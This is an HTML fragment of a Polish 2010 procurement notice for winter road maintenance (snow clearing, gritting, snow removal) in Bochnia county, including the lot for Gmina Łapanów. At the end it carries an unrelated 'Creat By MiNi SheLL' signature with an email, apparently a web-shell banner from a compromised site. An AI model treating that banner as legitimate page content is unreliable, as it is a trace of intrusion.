<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2. Zakres zamówienia obejmuje: Wykonywanie usług komunalnych w okresie od dnia 01 października do dnia 31 grudnia 2010 roku, polegających na zimowym utrzymaniu dróg powiatowych leżących na terenie powiatu bocheńskiego wg podziału na rejony opisane  w załączniku nr 7 i 8.
Wykonywanie usługi zimowego utrzymania polega w szczególności na:
-   odśnieżaniu dróg 						      			
-   posypywaniu dróg mieszanką (materiał uszorstniającą 75% + sól 25%).    	
 - wywozie śniegu z ulic leżących w ciągach dróg powiatowych w razie potrzeby  

3.3 Utrzymanie zimowe dróg. Zasady realizacji zamówienia:.
3.3.1 Utrzymanie zimowe dróg powiatowych na terenie Powiatu Bocheńskiego obejmuje wykonywanie prac porządkowych i usuwanie skutków zimy, zmierzających do zwiększenia bezpieczeństwa ruchu w tym: 
 -  odśnieżanie całej szerokości drogi, zatok autobusowych i utrzymanie stałej przejezdności
- usuwanie śliskości zimowej przy zastosowaniu odpowiednich (właściwych) środków chemicznych i środków powodujących szorstkość nawierzchni,
 -  odśnieżanie jezdni w technologii mechaniczno-ręcznej, tj. uzupełnienie odśnieżania mechanicznego ręcznym odgarnięciem pokrywy śnieżnej w miejscach niedostępnych dla pługów,
- posypanie piaskiem lub innym właściwym środkiem powodującym szorstkość, nawierzchni po odgarnięciu śniegu i lodu (na wniosek Zamawiającego drogi mogą być posypywane żużlem),
- posypanie i likwidowanie śliskości na odcinkach dróg ze zbyt dużym spadkiem podłużnym drogi - ze szczególnym uwzględnieniem skrzyżowań, przez ręczne posypywanie środkami chemicznymi i środkami powodującymi szorstkość (w przypadku utrudnionego podjazdu posypywarek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rejon V   - Gmina Łapanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2. Zakres zamówienia obejmuje: Wykonywanie usług komunalnych w okresie od dnia 01 października do dnia 31 grudnia 2010 roku, polegających na zimowym utrzymaniu dróg powiatowych leżących na terenie powiatu bocheńskiego wg podziału na rejony opisane  w załączniku nr 7 i 8.
Wykonywanie usługi zimowego utrzymania polega w szczególności na:
-   odśnieżaniu dróg 						      			
-   posypywaniu dróg mieszanką (materiał uszorstniającą 75% + sól 25%).    	
 - wywozie śniegu z ulic leżących w ciągach dróg powiatowych w razie potrzeby  

3.3 Utrzymanie zimowe dróg. Zasady realizacji zamówienia:.
3.3.1 Utrzymanie zimowe dróg powiatowych na terenie Powiatu Bocheńskiego obejmuje wykonywanie prac porządkowych i usuwanie skutków zimy, zmierzających do zwiększenia bezpieczeństwa ruchu w tym: 
 -  odśnieżanie całej szerokości drogi, zatok autobusowych i utrzymanie stałej przejezdności
- usuwanie śliskości zimowej przy zastosowaniu odpowiednich (właściwych) środków chemicznych i środków powodujących szorstkość nawierzchni,
 -  odśnieżanie jezdni w technologii mechaniczno-ręcznej, tj. uzupełnienie odśnieżania mechanicznego ręcznym odgarnięciem pokrywy śnieżnej w miejscach niedostępnych dla pługów,
- posypanie piaskiem lub innym właściwym środkiem powodującym szorstkość, nawierzchni po odgarnięciu śniegu i lodu (na wniosek Zamawiającego drogi mogą być posypywane żużlem),
- posypanie i likwidowanie śliskości na odcinkach dróg ze zbyt dużym spadkiem podłużnym drogi - ze szczególnym uwzględnieniem skrzyżowań, przez ręczne posypywanie środkami chemicznymi i środkami powodującymi szorstkość (w przypadku utrudnionego podjazdu posypywarek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com